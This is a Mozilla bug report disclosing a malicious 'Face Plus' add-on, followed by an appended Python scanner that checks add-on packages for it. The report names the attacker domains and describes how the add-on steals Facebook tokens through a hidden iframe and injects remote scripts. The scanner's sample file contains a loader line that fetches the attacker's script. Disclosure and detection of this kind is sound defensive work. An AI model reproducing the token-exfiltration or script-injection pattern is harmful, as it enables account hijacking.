Closed Bug 743012 Opened 13 years ago Closed 13 years ago

Malicious "Face Plus" add-on

Categories

(Toolkit :: Blocklist Policy Requests, defect)

RESOLVED FIXED

People

(Reporter: mhammell, Assigned: jorgev)

Attachments

(1 file)

490.38 KB, application/octet-stream
Attached file 20120406_faceplus.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Steps to reproduce:

Downloaded from http://install.faceplus.biz/face-plus.xpi

Actual results:

NOTE: Attempt to access any of the JS directly, without a referer of Facebook will get you bounced to http://userscripts.org/scripts/source/61761.user.js, which is the SocialFixer plugin JS

adobeflashplayer.js: JS in add-on
  Injects http://cdn.faceplus.biz/faceplus.js

faceplus.js:
  URLs included at start of script
    var reklam ="http://ads.faceplus.biz/reklam.html?&s&";
    var bokcurl='http://faceklenti10.zapto.org/yon.php';
    linek=new Array("http://begeni.zapto.org/yon.php",
                    "http://faceplus2.mm.am/yon.php",
                    "http://faceplus3.mm.am/yon.php",
                    "http://faceplus4.mm.am/yon.php",
                    "http://faceplus5.mm.am/yon.php",
                    "http://faceplus.crabdance.com/yon.php",
                    "http://faceplus.uk.to/yon.php",
                    "http://faceplus.ignorelist.com/",
                    "http://faceplus.strangled.net/",
                    "http://faceplus.twilightparadox.com/");
  Injects http://graph.facebook.com/<uid>?callback=cins, to get your public profile data
  Injects http://cdn.faceplus.biz/graph.js or http://faceplus.biz/z.js
  Tries to inject 'http://ec2-46-137-155-64.eu-west-1.compute.amazonaws.com/camera/2012/04/03/16/1333458695713783.jpg as a script, AWS returns an error

graph.js:
  Posts the user's tokens to http://begeni.zapto.org/pom.html? every hour, via a hidden iframe; once the attacker has these tokens, they can post as the user, from any computer/server they want.
  Injects http://ec2-46-137-155-64.eu-west-1.compute.amazonaws.com/camera/2012/03/28/19/1332953948955831.jpg as the source of a script tag
  Uses local storage to maintain state

z.js:
  Can do the following, based on configuration:
    like a page
    add a subscription
    send a friend request
    report users as abusive
  Auto installs FB App 338319369521728, giving it full access to the user's account
  Posts the user's tokens to http://begeni.zapto.org/pom.html? every hour, via a hidden iframe; once the attacker has these tokens, they can post as the user, from any computer/server they want.
  Uses local storage to maintain state

Expected results:

It should not steal your tokens and send them to a third party server or install a Facebook app without your consent.
ID: {8f42fb8b-b6f6-45de-81c0-d6d39f54f971}
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
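
A static triage check for the behaviour reported above, added here as an example and not part of the bug or of Mozilla's blocklist tooling: it walks an XPI, including nested .jar archives, and flags JavaScript that references hosts named in the report or matches the script-injection, iframe and local-storage behaviours it describes. The function names, the regex heuristics and the sample archive are assumptions constructed for illustration.

```python
import io
import re
import zipfile
# Hosts named in the report; a host matches an entry or any subdomain of it.
REPORTED_HOSTS = ("faceplus.biz", "begeni.zapto.org", "faceklenti10.zapto.org")
# Behaviours the report describes; the regexes are heuristics chosen for this example.
BEHAVIOURS = {
    "script-injection": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I),
    "iframe-creation": re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.I),
    "local-storage": re.compile(r"\blocalStorage\b"),
}
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def is_reported(host):
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in REPORTED_HOSTS)

def scan_xpi(data, prefix=""):
    """Return {path: {"hosts": [...], "behaviours": [...]}} for each .js file with a finding."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for name in archive.namelist():
            path = prefix + name
            if name.lower().endswith((".jar", ".xpi")):
                try:  # older add-ons keep chrome code in a nested archive; scan it too
                    findings.update(scan_xpi(archive.read(name), path + "!/"))
                except zipfile.BadZipFile:
                    findings[path] = {"hosts": [], "behaviours": ["unreadable-archive"]}
            elif name.lower().endswith(".js"):
                text = archive.read(name).decode("utf-8", errors="replace")
                hosts = sorted({h.lower() for h in HOST_RE.findall(text) if is_reported(h)})
                seen = sorted(k for k, rx in BEHAVIOURS.items() if rx.search(text))
                if hosts or seen:
                    findings[path] = {"hosts": hosts, "behaviours": seen}
    return findings

def make_zip(files):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for name, body in files.items():
            archive.writestr(name, body)
    return buf.getvalue()

# Constructed sample, not the real add-on: a loader inside a nested jar plus a clean file.
SAMPLE_XPI = make_zip({
    "chrome/sample.jar": make_zip({"content/loader.js":
        "var s = document.createElement('script'); s.src = 'http://cdn.faceplus.biz/faceplus.js';"}),
    "defaults/prefs.js": "pref('extensions.sample.enabled', true);",
})
```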